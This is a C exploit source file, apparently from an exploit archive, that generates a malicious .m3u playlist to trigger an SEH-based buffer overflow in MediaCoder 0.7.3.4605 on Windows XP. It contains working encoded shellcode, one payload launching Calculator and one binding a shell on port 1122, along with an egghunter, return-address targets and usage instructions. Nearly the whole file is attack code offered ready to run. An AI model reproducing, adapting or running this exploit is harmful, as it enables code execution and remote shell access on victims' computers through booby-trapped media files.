|
/* Download: http://www.mediacoderhq.com/download.htm Compilation: mediac.c.......Win32(cygwin,Devcpp) Tested on Windows xp sp3 Date: 24.02.2010 1.We get control of EIP by overwriting a seh handler with pop pop retn instr and pass exception. 2.We position shellcode where is convienient(basicly anywhere in memory). 3.We position a egghunter at the top of the stack frame and we overwrite EIP with a jmp instr to land and execute it. Next it will search memory for our shellcode and execute it succesfully. Video here: http://www.youtube.com/watch?v=S1nAWuFzyGE */ #include<stdio.h> #include<getopt.h>
#define pausescreen() getchar() #define FOR(i,a,b) for(i=a;i<b;++i) #define IFeq(a,b) if(a==b) #define IFless(a,b) if(a<b) #define IFgreat(a,b) if(a>b) #define IFneq(a,b) if(a!=b) #define IFnot(a) if(!a) #define split(s) exit(s) #define R return #define nul NULL #define VER "0.7.3.4605" #define POCNAME "MediaCoder local buffer overflow exploit" #define AUTHOR "fl0 fl0w" #define BUFFSIZE 0x1869F #define NSEH_OFFSET 0x2FC #define NOP "\x90\x90\x90\x90\x90" \ "\x90\x90\x90\x90\x90" \ "\x90\x90\x90\x90\x90" \ "\x90\x90\x90\x90\x90" #define size(a) strlen(a) #define CLEAN(a) free(a) typedef char i8; typedef short i16; typedef int i32; typedef long i64; typedef const int ci32; enum{True=1,False=0,Error=-1}; void print(i8*); void gen_random(i8*,const int); void exploit(i8*,i8**); unsigned int getFsize(FILE*,i8*); void printshell(); void printret(); void print(i8*); void help(); struct { i8 *name; i32 size; i8 *type; }shellcode[]={ {"Calculator",343, "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" "\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47" "\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48" "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38" "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48" "\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44" "\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48" "\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33" "\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37" "\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a" "\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b" "\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53" "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57" "\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59" "\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56" "\x4e\x56\x43\x46\x42\x30\x5a"}, {"Bind port 1122",709, "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x37" "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48" "\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48" "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x45\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" "\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x44" "\x4b\x58\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" "\x49\x38\x4e\x36\x46\x52\x4e\x41\x41\x56\x43\x4c\x41\x33\x4b\x4d" "\x46\x56\x4b\x38\x43\x34\x42\x53\x4b\x38\x42\x44\x4e\x30\x4b\x48" "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x30\x50\x45\x4a\x46" "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" "\x43\x55\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57" "\x44\x43\x4f\x45\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e" "\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x56\x44\x30" "\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" "\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44" "\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x46\x50" "\x44\x36\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a" "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" "\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d" "\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x55\x4f\x4f\x48\x4d" "\x42\x55\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46" "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x35" "\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x56" "\x4d\x36\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x32\x4e\x4c" "\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x54\x4e\x52" "\x43\x39\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f" "\x48\x4d\x4b\x45\x47\x55\x44\x45\x41\x45\x41\x35\x41\x45\x4c\x56" "\x41\x50\x41\x45\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x36" "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f" "\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" "\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a" }, {nul,0,nul}}; struct {/*pop pop ret addr*/ unsigned int ret; i8* tname; }target[]={ {0x66015926, "Universal(libiconv-2.dll) =>" }, {0x72D115B8, "Windows xp sp2 en kernel32.dll =>" }, {0x7C902783, "Windows sp3 en ntdll.dll =>" }, {0x77E829EC, "Windows xp sp1 en =>" }, {0,nul} }; i8 egghunter[]=/*IsBadReadPtr egghunter 32 bytes*/ "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x66\x6C\x30\x77" //fl0w tag "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"; i8 tag[]="\x66\x6C\x30\x77" "\x66\x6C\x30\x77"; i8 nseh[]="\xEB\x06\x90\x90"; i8 buffer[BUFFSIZE]; i32 c,sh; i8 *filen; i32 k; unsigned int retcode,eip; i32 main(i32 argc,i8** argv) { system("cls"); printf("[#]%s\n[#]Ver %s\n[#]Author %s\n",POCNAME,VER,AUTHOR); IFless(argc,2){ help(); print("Shellcode options:"); printshell(); printf("\n"); print("Retcode options:"); printret(); split(0);} while((c=getopt(argc,argv,"f:s:t:v"))!=-1){ switch(c){ case 'f': filen=optarg; break; case 's': sh=atoi(optarg); break; case 't': eip=atoi(optarg); break; case 'v': if(strcmp(argv[5],"-t")==0) k=8; else k=6; sscanf(argv[k],"%x",&retcode); break; default: help(); } } exploit(filen,argv); print("done!"); pausescreen(); R 0; } void exploit(i8* fname,i8** argv) { FILE* f=fopen(fname,"wb"); IFnot(f){ print("file won't write"); split(0); } gen_random(buffer,0x2FC); memcpy(buffer+NSEH_OFFSET,nseh,4); if(strcmp(argv[5],"-t")==0) memcpy(buffer+0x300,&target[eip].ret,4); else memcpy(buffer+0x300,&retcode,4); memcpy(buffer+0x304,NOP,0x14); memcpy(buffer+0x318,egghunter,size(egghunter)); memset(buffer+0x34A,0x41,0x4D2); memcpy(buffer+0x81C,tag,8); memcpy(buffer+0x824,shellcode[sh].type,shellcode[sh].size); fwrite(buffer,1,0x824+shellcode[sh].size,f); fclose(f); CLEAN(buffer); printf("[#]File size is: %d bytes\n",getFsize(f,fname)); } void print(i8* msg) { printf("[*]%s\n",msg); } void gen_random(char *s, const int len) { i32 i; static const char alphanum[]= { "0123456789ABCDEFGHIJKLMNOPQRST" "UVWXYZabcdefghijklmnopqrstuvwxyz"}; FOR(i,0,len) { s[i]=alphanum[rand()%(sizeof(alphanum)-1)]; } s[len]=0; } unsigned int getFsize(FILE* g,i8* gname) {unsigned int s; g=fopen(gname,"rb"); IFeq(g,NULL) { print("File error at reading"); exit(0); } fseek(g,0,SEEK_END); s=ftell(g); R s;} void printshell() { i32 i; FOR(i,0,2){ printf("\t%d)%s %d bytes\n",i,shellcode[i].name,shellcode[i].size); } } void printret() { i32 j; FOR(j,0,4){ printf("\t%d)%s 0x%x\n",j,target[j].tname,target[j].ret); } } void help() { i8 h[]="***************************************************************************\n" "*syntax: [-f<file.m3u>] [-s<shellcode>] [-t<target>] [-v<your target>] *\n" "* -f filename *\n" "* -s shellcode to run 0 or 1 *\n" "* -t target *\n" "* -v your target *\n" "* example: mediacoder.exe -f vuln.m3u -s 0 -t 1 *\n" "* mediacoder.exe -f vuln.m3u -s 1 -v 0xFFFFFFFF *\n" "* *\n" "* *\n" "***************************************************************************\n"; printf("%s",h);}
|